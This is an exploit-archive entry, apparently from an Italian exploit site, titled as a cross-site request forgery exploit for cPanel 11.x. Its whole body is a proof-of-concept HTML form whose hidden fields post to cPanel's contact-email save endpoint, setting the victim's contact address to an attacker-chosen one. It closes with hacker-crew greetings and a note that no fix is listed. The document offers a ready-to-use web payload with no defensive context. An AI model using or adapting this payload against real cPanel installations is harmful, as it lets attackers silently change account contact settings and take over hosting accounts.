Cpanel 11.X Edit E-mail Cross Site Request Forgery exploit

2010-11-21 09:15:10

# Exploit Title: Cpanel 11.X Edit E-mail Cross Site Request Forgery exploit
# Date: 22 - 10 - 2010
# Author: Mon7rF
# Mail : [email protected]
# Tested on: Windows 7

--------------------------------------------------------------------------------------

<form onsubmit="return do_validate(this.id);" id="mainform" name="mainform"
action="http://www.site.com:2082/frontend/x3/contact/saveemail.html">

<input id="email" name="email" type="hidden" value="[email protected]">
<input id="second_email" name="second_email" type="hidden" value="">
<input id="notify_disk_limit" name="notify_disk_limit" type="hidden" value="1">
<input id="notify_bandwidth_limit" name="notify_bandwidth_limit" type="hidden" value="1">
<input id="notify_email_quota_limit" name="notify_email_quota_limit" type="hidden" value="1">

<input type="submit" class="input-button" value="Save">

</form>

--------------------------------------------------------------------------------------

Gr33ts : RENO - Mr.M3x - all Member p0c Team ..

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.